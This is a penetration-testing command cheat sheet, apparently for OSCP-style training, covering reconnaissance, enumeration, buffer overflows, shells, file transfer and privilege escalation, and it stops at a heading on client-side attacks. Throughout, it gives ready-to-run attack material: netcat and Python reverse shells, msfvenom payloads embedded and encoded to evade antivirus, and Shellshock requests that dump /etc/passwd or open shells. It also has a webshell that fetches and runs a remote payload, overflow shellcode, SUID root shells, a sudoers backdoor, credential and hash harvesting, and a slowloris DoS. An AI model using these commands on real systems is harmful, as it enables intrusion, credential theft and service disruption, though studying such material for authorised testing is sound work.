Linux 101
Set the Target IP Address to the $ip system variable
$ export ip=192.168.1.100
Find the location of a file
$ locate sbd.exe
Search through directories in the $PATH environment variable
$ which sbd
Find a search for a file that contains a specific string in it’s name
$ find / -name sbd\*
Show active internet connections
$ netstat -lntp
Change Password
$ passwd
Verify a service is running and listening
$ netstat -antp |grep apache
Start a service
$ systemctl start ssh
$ systemctl start apache2
Unzip a gz file
$ gunzip access.log.gz
Unzip a tar.gz file
$ tar -xzvf file.tar.gz
Search command history
history | grep phrase\_to\_search\_for
Have a service start at boot
systemctl enable ssh
Stop a service
systemctl stop ssh
Download a webpage
wget [www.cisco.com](http://www.cisco.com)
Open a webpage
`curl www.cisco.com
String manipulation
Count number of lines in file
wc index.html
Get the start or end of a file
head index.html tail index.html
Extract all the lines that contain a string
grep "href=" index.html
Cut a string by a delimiter, filter results then sort
grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u
Using Grep and regular expressions and output to a file
cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt
Use a bash loop to find the IP address behind each host
for url in $(cat list.txt); do host $url; done
Collect all the IP Addresses from a log file and sort by frequency
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
Netcat - Read and write TCP and UDP Packets
Connect to a POP3 mail server
nc -nv $ip 110
Listen on TCP/UDP port
nc -nlvp 4444
Connect to a netcat port
nc -nv $ip 4444
Send a file using netcat
nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe
Receive a file using netcat
nc -nlvp 4444 > incoming.exe
Create a reverse shell with Ncat using cmd.exe on Windows
nc -nlvp 4444 -e cmd.exe
Create a reverse shell with Ncat using bash on Linux
nc -nv $ip 4444 -e /bin/bash
Ncat - Netcat for Nmap project which provides more security avoid IDS
Reverse shell from windows using cmd.exe using ssl
ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl
Listen on port 4444 using ssl
ncat -v $ip 4444 --ssl
Wireshark
Show only SMTP (port 25) and ICMP traffic: tcp.port eq 25 or icmp
Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet: ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs: ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip
Some commands are equal ip.addr == 10.43.54.65 Equals ip.src == 10.43.54.65 or ip.dst == 10.43.54.65
ip.addr != 10.43.54.65 Equals ip.src != 10.43.54.65 or ip.dst != 10.43.54.65
Tcpdump
Display a pcap file
tcpdump -r password\_cracking\_filtered.pcap
Display ips and filter and sort
tcpdump -n -r password\_cracking\_filtered.pcap | awk -F" " '{print $3}' | sort -u | head
Grab a packet capture on port 80
tcpdump tcp port 80 -w output.pcap -i eth0
Check for ACK or PSH flag set in a TCP packet
tcpdump -A -n 'tcp\[13\] = 24' -r password\_cracking\_filtered.pcap
IPTables deny traffic to ports except for Local Loopback
iptables -A INPUT -p tcp --destination-port 13327 \\! -d $ip -j DROP
iptables -A INPUT -p tcp --destination-port 4444 \\! -d $ip -j DROP
Information Gathering & Vulnerability Scanning
Passive Information Gathering
Google Hacking
Google search to find website sub domains
site:microsoft.com site:[www.microsoft.com](http://www.microsoft.com)
Google filetype, and intitle
intitle:”netbotz appliance” “OK” -filetype:pdf
Google inurl
inurl:”level/15/sexec/-/show”
Google Hacking Database:
https://www.exploit-db.com/google-hacking-database/
SSL Certificate Testing
https://www.ssllabs.com/ssltest/analyze.html
Email Harvesting
Simply Email
git clone https://github.com/killswitch-GUI/SimplyEmail.git ./SimplyEmail.py -all -e TARGET-DOMAIN
Netcraft
Determine the operating system and tools used to build a site
https://searchdns.netcraft.com/
Whois Enumeration
whois domain-name-here.com whois $ip
Banner Grabbing
nc -v $ip 25
telnet $ip 25
nc TARGET-IP 80
Recon-ng - full-featured web reconnaissance framework written in Python
cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git cd /opt/recon-ng ./recon-ng show modules help
Active Information Gathering
DNS Enumeration
Host Lookup
host -t ns megacorpone.com
Reverse Lookup Brute Force - find domains in the same range
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
Perform DNS IP Lookup
dig a domain-name-here.com @nameserver
Perform MX Record Lookup
dig mx domain-name-here.com @nameserver
Perform Zone Transfer with DIG
dig axfr domain-name-here.com @nameserver
DNS Zone Transfers
Windows DNS zone transfer
nslookup -> set type=any -> ls -d blah.com Linux DNS zone transfer
dig axfr blah.com @ns1.blah.com
Dnsrecon DNS Brute Force
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
Dnsrecon DNS List of megacorp
dnsrecon -d megacorpone.com -t axfr
DNSEnum
dnsenum zonetransfer.me
Port Scanning
Subnet Reference Table
/ Addresses Hosts Netmask Amount of a Class C
/30 4 2 255.255.255.252 1/64
/29 8 6 255.255.255.248 1/32
/28 16 14 255.255.255.240 1/16
/27 32 30 255.255.255.224 1/8
/26 64 62 255.255.255.192 1/4
/25 128 126 255.255.255.128 1/2
/24 256 254 255.255.255.0 1
/23 512 510 255.255.254.0 2
/22 1024 1022 255.255.252.0 4
/21 2048 2046 255.255.248.0 8
/20 4096 4094 255.255.240.0 16
/19 8192 8190 255.255.224.0 32
/18 16384 16382 255.255.192.0 64
/17 32768 32766 255.255.128.0 128
/16 65536 65534 255.255.0.0 256
Set the ip address as a varble
export ip=192.168.1.100 nmap -A -T4 -p- $ip
Netcat port Scanning
nc -nvv -w 1 -z $ip 3388-3390
Discover who else is on the network
netdiscover
Discover IP Mac and Mac vendors from ARP
netdiscover -r $ip/24
Nmap stealth scan using SYN
nmap -sS $ip
Nmap stealth scan using FIN
nmap -sF $ip
Nmap Banner Grabbing
nmap -sV -sT $ip
Nmap OS Fingerprinting
nmap -O $ip
Nmap Regular Scan:
nmap $ip/24
Enumeration Scan
nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt
Enumeration Scan All Ports TCP / UDP and output to a txt file
nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip
Nmap output to a file:
nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24
Quick Scan:
nmap -T4 -F $ip/24
Quick Scan Plus:
nmap -sV -T4 -O -F --version-light $ip/24
Quick traceroute
nmap -sn --traceroute $ip
All TCP and UDP Ports
nmap -v -sU -sS -p- -A -T4 $ip
Intense Scan:
nmap -T4 -A -v $ip
Intense Scan Plus UDP
nmap -sS -sU -T4 -A -v $ip/24
Intense Scan ALL TCP Ports
nmap -p 1-65535 -T4 -A -v $ip/24
Intense Scan - No Ping
nmap -T4 -A -v -Pn $ip/24
Ping scan
nmap -sn $ip/24
Slow Comprehensive Scan
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24
Scan with Active connect in order to weed out any spoofed ports designed to troll you
nmap -p1-65535 -A -T5 -sT $ip
Enumeration
NMap Enumeration Script List:
NMap Discovery
https://nmap.org/nsedoc/categories/discovery.html
Nmap port version detection MAXIMUM power
nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>
SMB Enumeration
SMB OS Discovery
nmap $ip --script smb-os-discovery.nse
Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254
Netbios Information Scanning
nbtscan -r $ip/24
Nmap find exposed Netbios servers
nmap -sU --script nbstat.nse -p 137 $ip
SMB Enumeration Tools
nmblookup -A $ip smbclient //MOUNT/share -I $ip -N rpcclient -U "" $ip enum4linux $ip enum4linux -a $ip
SMB Finger Printing
smbclient -L //$ip
Nmap Scan for Open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 $ip/24
Nmap scans for vulnerable SMB Servers
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip
Nmap List all SMB scripts installed
ls -l /usr/share/nmap/scripts/smb\*
Enumerate SMB Users
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14
python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip
RID Cycling - Null Sessions
https://www.trustedsec.com/march-2013/new-tool-release-rpc_enum-rid-cycling-attack/
ridenum.py $ip 500 50000 dict.txt
use auxiliary/scanner/smb/smb\_lookupsid
Manual Null Session Testing
Windows: net use \\\\$ip\\IPC$ "" /u:""
Linux: smbclient -L //$ip
LLMNR / NBT-NS Spoofing - Steal credentials off the network.
Spoof / poison LLMNR / NetBIOS requests:
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
Capture the hashes:
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
Using Responder to Steal Creds
git clone https://github.com/SpiderLabs/Responder.git python Responder.py -i local-ip -I eth0
SMTP Enumeration - Mail Severs
Verify SMTP port using Netcat
nc -nv $ip 25
SNMP Enumeration -Simple Network Management Protocol
Fix SNMP output values so they are human readable
apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf
SNMP Enumeration Commands
snmpcheck -t $ip -c public
snmpwalk -c public -v1 $ip 1|
grep hrSWRunName|cut -d\* \* -f
snmpenum -t $ip
onesixtyone -c names -i hosts
SNMPv3 Enumeration
nmap -sV -p 161 --script=snmp-info $ip/24
Automate the username enumeration process for SNMPv3:
apt-get install snmp snmp-mibs-downloader wget <https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb>
SNMP Default Credentials
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
Linux OS Enumeration
List all SUID files
find / -perm -4000 2>/dev/null
Determine the current version of Linux
cat /etc/issue
Determine more information about the environment
uname -a
List processes running
ps -xaf
List the allowed (and forbidden) commands for the invoking use
sudo -l
List iptables rules
iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security
Windows OS Enumeration
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Vulnerability Scanning with Nmap
Nmap Exploit Scripts
https://nmap.org/nsedoc/categories/exploit.html
Nmap search through vulnerability scripts
cd /usr/share/nmap/scripts/ ls -l \*vuln\*
Nmap search through Nmap Scripts for a specific keyword
ls /usr/share/nmap/scripts/\* | grep ftp
Scan for vulnerable exploits with nmap
nmap --script exploit -Pn $ip
NMap Auth Scripts
https://nmap.org/nsedoc/categories/auth.html
Nmap Vuln Scanning
https://nmap.org/nsedoc/categories/vuln.html
NMap DOS Scanning
nmap --script dos -Pn $ip NMap Execute DOS Attack nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
Scan for coldfusion web vulnerabilities
nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
Anonymous FTP dump with Nmap
nmap -v -p 21 --script=ftp-anon.nse $ip-254
SMB Security mode scan with Nmap
nmap -v -p 21 --script=ftp-anon.nse $ip-254
File Enumeration
Find UID 0 files root execution
/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null
Get handy linux file system enumeration script (/var/tmp)
wget <https://highon.coffee/downloads/linux-local-enum.sh> chmod +x ./linux-local-enum.sh ./linux-local-enum.sh
Find executable files updated in August
find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug
Find a specific file on linux
find /. -name suid\*
Find all the strings in a file
strings <filename>
Determine the type of a file
file <filename>
HTTP Enumeration
Search for folders with gobuster:
gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
OWasp DirBuster - Http folder enumeration - can take a dictionary file
Dirb - Directory brute force finding using a dictionary file
dirb http://$ip/ wordlist.dict dirb <http://vm/>
Dirb against a proxy
dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129
Nikto
nikto -h $ip
HTTP Enumeration with NMAP
nmap --script=http-enum -p80 -n $ip/24
Nmap Check the server methods
nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Get Options available from web server curl -vX OPTIONS vm/test
Uniscan directory finder:
uniscan -qweds -u <http://vm/>
Wfuzz - The web brute forcer
wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"
Open a service using a port knock (Secured with Knockd)
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done
WordPress Scan - Wordpress security scanner
wpscan --url $ip/blog --proxy $ip:3129
RSH Enumeration - Unencrypted file transfer system
auxiliary/scanner/rservices/rsh_login
Finger Enumeration
finger @$ip
finger batman@$ip
TLS & SSL Testing
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html
Proxy Enumeration (useful for open proxies)
nikto -useproxy http://$ip:3128 -h $ip
Steganography
apt-get install steghide
steghide extract -sf picture.jpg
steghide info picture.jpg
apt-get install stegosuite
The OpenVAS Vulnerability Scanner
apt-get update
apt-get install openvas
openvas-setup
netstat -tulpn
Login at:
https://$ip:9392
Buffer Overflows and Exploits
DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
MSFvenom
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
Windows Buffer Overflows
Controlling EIP
locate pattern_create
pattern_create.rb -l 2700
locate pattern_offset
pattern_offset.rb -q 39694438
Verify exact location of EIP - [*] Exact match at offset 2606
buffer = "A" * 2606 + "B" * 4 + "C" * 90
Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
Use Mona to determine a module that is unprotected
Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
Otherwise without DEP, we can stick our
Use NASM to determine the HEX code for a JMP ESP instruction
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP
00000000 FFE4 jmp esp
Run Mona in immunity log window to find (FFE4) XEF command
!mona find -s "\xff\xe4" -m slmfc.dll
found at 0x5f4a358f - Flip around for little endian format
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
MSFVenom to create payload
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Final Payload with NOP slide
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
Create a PE Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f
exe -o shell_reverse.exe
Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f
exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
Create a PE reverse shell and embed it into an existing executable
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Create a PE Reverse HTTPS shell
msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe
Linux Buffer Overflows
Run Evans Debugger against an app
edb --run /usr/games/crossfire/bin/crossfire
ESP register points toward the end of our CBuffer
add eax,12
jmp eax
83C00C add eax,byte +0xc
FFE0 jmp eax
Check for “Bad Characters” Process of elimination - Run multiple times 0x00 - 0xFF
Find JMP ESP address
"\x97\x45\x13\x08" # Found at Address 08134597
crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" –e x86/shikata_ga_nai
Connect to the shell with netcat:
nc -v $ip 4444
Shells
Netcat Shell Listener
nc -nlvp 443
Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user. (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell ) (hint: sudo -l to see what you can run)
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh"
(From within vi)
:!bash
From within vim
Breaking out of vim is done by ':!bash':
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh
(From within tcpdump)
echo $’id\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
from busybox
/bin/busybox telnetd -|/bin/sh -p9999
Pen test monkey PHP reverse shell
http://pentestmonkey.net/tools/web-shells/php-reverse-shel
php-findsock-shell - turns PHP port 80 into an interactive shell
http://pentestmonkey.net/tools/web-shells/php-findsock-shell
Perl Reverse Shell
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
PHP powered web browser Shell b374k with file upload etc.
https://github.com/b374k/b374k
Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
Web Backdoors from Fuzzdb ( https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
SSH to Meterpreter:
use auxiliary/scanner/ssh/ssh_login
use post/multi/manage/shell_to_meterpreter
https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
Compiling Windows Exploits on Kali
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw\_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
Cross Compiling Exploits
gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)
Shellshock
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
Shell Shock SSH Forced Command
Check for forced command by enabling all debug output with ssh
ssh -vvv
ssh -i noob noob@$ip '() { :;}; /bin/bash'
cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock reverse Shell
nc -l -p 443
Buffer Overflow Exploits
Pass 1000 A’s as a parameter
./r00t $(python -c 'print "A" * 1000')
Random Pattern Create
/usr/share/metasploit-framework/tools# ruby pattern_create.rb 1000
Determine Pattern offset
ruby pattern_offset.rb 0x6a413969
Pass shell with offset value
env - ./r00t $(python -c 'print "A"*268 + "\x80\xfc\xff\xbf" + "\x90"*16 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
# id
From Fuzzing to Zero Day
https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/
Nmap Fuzzers:
NMap Fuzzer List
https://nmap.org/nsedoc/categories/fuzzer.html
NMap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
Nmap DNS Fuzzer
nmap --script dns-fuzz --script-args timelimit=2h $ip -d
File Transfers
Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target.
Simple Local Web Servers
Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
Run a basic Python3 http server, great for serving up shells etc
python3 -m http.server
Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
Run a basic PHP http server
php -S $ip:80
Creating a wget VB Script on Windows:
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt
Mounting File Shares
Mount NFS share to /mnt/nfs
mount $ip:/vol/share /mnt/nfs
HTTP Put
nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
Uploading Files
SCP
scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
scp localfile username@$ip:~/Folder/
Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
davtest -move -sendbd auto -url http://$ip
https://github.com/cldrn/davtest
You can also upload a file using the PUT method with the curl command:
curl -T 'leetshellz.txt' 'http://$ip'
And rename it to an executable file using the MOVE method with the curl command:
curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'
Upload shell using limited php shell cmd
use the webshell to download and execute the meterpreter
[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php
[curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php
curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
TFTP
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
EX. FROM WINDOWS HOST:
C:\Users\Offsec>tftp -i $ip get nc.exe
FTP
apt-get update && apt-get install pure-ftpd
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Packing Files
Ultimate Packer for eXecutables
upx -9 nc.exe
exe2bat - Converts EXE to a text file that can be copied and pasted
locate exe2bat
wine exe2bat.exe nc.exe nc.txt
Veil - Evasion Framework - https://github.com/Veil-Framework/Veil-Evasion
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Privilege Escalation
Linux Privilege Escalation
Try the obvious - Maybe the user can sudo to root:
sudo su
Highon.coffee Linux Local Enum wget https://highon.coffee/downloads/linux-local-enum.sh
Basic Linux Privilege Escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Linux Privilege Exploit Suggester
https://github.com/PenturaLabs/Linux_Exploit_Suggester
Linux post exploitation enumeration and exploit checking tools
https://github.com/reider-roque/linpostexp
CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
https://www.exploit-db.com/exploits/15285/
CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
https://git.zx2c4.com/CVE-2012-0056/about/
Linux CVE 2012-0056
wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper
CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
https://dirtycow.ninja/
First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016
./cow32
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Run a command as a user other than root
sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
Add a user or change a password
/usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor
echo thePassword | passwd haxzor --stdin
Local Privilege Escalation Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and paste examples for various shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
Create and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0); setuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc
Add users to Root SUDO group with no password requirement
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
SearchSploit
searchsploit –uncsearchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
searchsploit slmail
Kernel Exploit Suggestions for Kernel Version 3.0.0
./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0
Precompiled Linux Kernel Exploits - Super handy if GCC is not installed on the target machine!
https://www.kernel-exploits.com/
Collect root password
cat /etc/shadow |grep root
Find and display the proof.txt or flag.txt - LOOT! `cat ``find / -name proof.txt -print```
Windows Privilege Escalation
Windows Privilege Escalation resource http://www.fuzzysecurity.com/tutorials/16.html
Try the getsystem command using meterpreter - rarely works but is worth a try. meterpreter > getsystem
Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
mx11-080.exe -O XP
Powershell Priv Escalation Tools https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Windows Service Configuration Viewer - Check for misconfigurations in services that can lead to privilege escalation. You can replace the executable with your own and have windows execute whatever code you want as the privileged user.
icacls scsiaccess.exe
scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)
Compile a custom add user command in windows using C
root@kali:~# cat useradd.c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net localgroup administrators low /add");
return 0;
}
i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
Group Policy Preferences (GPP)
A common useful misconfiguration found in modern domain environments is unprotected Windows GPP settings files
map the Domain controller SYSVOL share
net use z: \\dc01\SYSVOL
Find the GPP file: Groups.xml
dir /s Groups.xml
Review the contents for passwords
type Groups.xml
Decrypt using GPP Decrypt
gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
Find and display the proof.txt or flag.txt - get the loot! #meterpreter > run post/windows/gather/win_privs
cd\ & dir /b /s proof.txt type c:\pathto\proof.txt
Client, Web and Password Attacks
Client Attacks
MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start
JAVA Signed Jar client side attack
